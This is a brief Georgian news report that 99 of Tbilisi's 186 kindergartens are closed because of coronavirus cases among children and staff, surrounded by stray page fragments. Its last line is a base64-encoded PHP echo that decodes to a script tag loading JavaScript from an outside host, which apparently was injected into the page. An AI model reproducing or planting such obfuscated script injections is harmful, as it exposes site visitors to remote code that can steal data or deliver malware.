celsiusi
ავერსი შნაიდერი
ბოლო მონაცემებით, კორონავირუსის შემთხვევების გამო, თბილისში არსებული 186 საბავშვო ბაღიდან 99 ბაღია დაკეტილი.
 
როგორც „ინტერპრესნიუსს“ თბილისის ბაღების მართვის სააგენტოში განუცხადეს, 53 ბაგა-ბაღის შემთხვევაში კორონავირუსით ინფიცირებული აღსაზრდელი იყო, ხოლო 46 შემთხვევაში ბაღის თანამშრომელი.
 
ბაგა-ბაღები სააღმზრდელო პროცესს საკარანტინო ვადის, 12 დღის გასვლისთანავე განაახლებენ.
 
ცნობისთვის, ბაგა-ბაღების მუშაობა 4 ოქტომბერს განახლდა.
893
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");